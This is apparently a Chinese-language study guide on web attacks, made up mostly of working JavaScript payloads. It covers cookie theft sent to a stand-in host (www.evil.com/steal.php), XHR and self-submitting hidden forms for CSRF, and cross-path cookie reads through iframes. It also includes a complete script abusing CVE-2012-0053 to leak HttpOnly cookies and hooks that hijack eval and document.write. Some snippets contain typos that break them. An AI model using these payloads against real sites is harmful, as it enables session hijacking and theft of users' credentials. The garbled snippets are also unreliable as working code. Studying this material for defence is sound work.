一.模拟用户发起浏览器请求
1.1 GET方式,实际上就是一个URL
new Image().src="http://www.evil.com/steal.php"+escape(document.cookie) location.href="http://www.evil.com/steal.php"+escape(document.cookie)
1.2 POST请求
同步发送请求
xhr=function(){ var request=false; if(window.XMLHttpRequest){ request=New XMLHttpRequest(); } else if (window.ActiveXObject){ try{ request=new window.ActiveXObject('Microsoft.XMLHTTP'); } catch(e){ } } return request; }(); request=function(method,src,argv,content_type){ xhr.open(method,src,false);//同步方式 if(method=='POST') xhr.setRequestHeader('Content-Type',content_type); xhr.send(argv); return xhr.responseText; } //默认表单形式 attack_a=function(){ var src="http://www.evil.com/steal.php"; var argv_0="&name1=value1&name2=value2"; request("POST",src,argv_0,"application/x-www-form-urlencoded");//默认表单形式 } //文件上传的表单 attack_a=function(){ var src="http://www.evil.com/steal.php"; var name1="value1"; var name2="value2"; var argv_0="\r\n";//HTTP消息头的第一行是空白的 argv_0+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"name1\"\r\n\r\n" argv_0+=(name1+"\r\n"); argv_0+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"name2\"\r\n\r\n" argv_0+=(name2+"\r\n"); argv+="---------------------7964f8dddeb95fc5--\r\n";//最后有两个减号--,表示HTTP 消息头结束 request("POST",src,argv_0,"multipart/form-data; boundary=-------------------7964f8dddeb95fc5"); }
Form表单自提交,常用于CSRF攻击中
function new_form(){ var f=document.createElement("form"); document.body.appendChild(f); f.method="post"; return f; } function create_elements(eForm,eName,eValue) { var e=document.createElement("input"); eForm.appendChild(e); e.type='text'; e.name=eName; if(!document.all){ e.style.display='none'; } else{ e.style.display='block'; e.style.width='0px'; e.style.height='0px'; } e.value=eValue; return e; } var _f=new_form();//创建一个form对象 create_elements(_f,"name1","value1");//创建form中的input对象 create_elements(_f,"name2","value2"); _f.action="http://www.evil.com/steal1.php";//form提交网址 _f.submit();//提交
二.Cookie机制
2.1子域Cookie机制,不同子域可以共享父域的Cookie
2.2路径Cookie机制,可以跨iframe跨路径读Cookie
xc=function(src){ var o=document.createElement("iframe");//iframe进入同域的目标 o.src=src; ducument.getElementsByTagName("body")[0].appendChild(o); o.onload=function(){//iframe加载完成后 d=o.contentDocument||o.contentWindow.document;//获取document对象 alert(d.cookie);//获取cookie }; }('http://a.foo.com/admin/index.php');
<?php setcookie("test",1,time()+3600,"","",0);//设置普通Cookie setcookie("test_http",1,time()+3600,"","",0,1);//最后一个参数是HttpOnly标志,0为关闭,1为开启,默认0 ?>
(1)php的phpinfo()信息会导致HttpOnly Cookie泄漏
(2)Django应用调试信息
(3)CVE-2012-0053 错误暴露HttpOnly Cookie
// Most browsers limit cookies to 4k characters, so we need multiple function setCookies (good) { // Construct string for cookie value var str = ""; for (var i=0; i< 819; i++) { str += "x"; } // Set cookies for (i = 0; i < 10; i++) { // Expire evil cookie if (good) {//清空垃圾Cookies var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;"; } // Set evil cookie else {//添加垃圾Cookies var cookie = "xss"+i+"="+str+";path=/"; } document.cookie = cookie; } } function makeRequest() { setCookies(); function parseCookies () { var cookie_dict = {}; // Only react on 400 status if (xhr.readyState === 4 && xhr.status === 400) { // Replace newlines and match <pre> content var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/); if (content.length) { // Remove Cookie: prefix content = content[1].replace("Cookie: ", ""); var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g); // Add cookies to object for (var i=0; i<cookies.length; i++) { var s_c = cookies[i].split('=',2); cookie_dict[s_c[0]] = s_c[1]; } } // Unset malicious cookies setCookies(true); alert(JSON.stringify(cookie_dict)); } } // Make XHR request var xhr = new XMLHttpRequest(); xhr.onreadystatechange = parseCookies; xhr.open("GET", "/", true); xhr.send(null); } makeRequest();Apache HTTP Server 2.2.x 多个版本没有严格限制HTTP 请求头信息,HTTP 请求头信息超过LimitRequestFieldSize长度时,服务器返回400,并将出错的请求头内容输出
2.3 Secure Cookie机制
document.cookie="test_secure=hijack;path=/;secure;"//path与domain必须一致,否则会被认为是不同的Cookie
三.JavaScript函数劫持
var _eval=eval; eval=function(x){ if(typeof(x)=='undefined') {return;} alert(x); _eval(x); }
var _write=document.write.bind(document); document.write=function(x){ if(typeof(x)=='underfined'){return;} _write(x); }; var _write=document.write; document.write=function(x){ if(typeof(x)=='undefined'){return;} _write.call(document,x); }; document.write("<script>alert(1)</script>");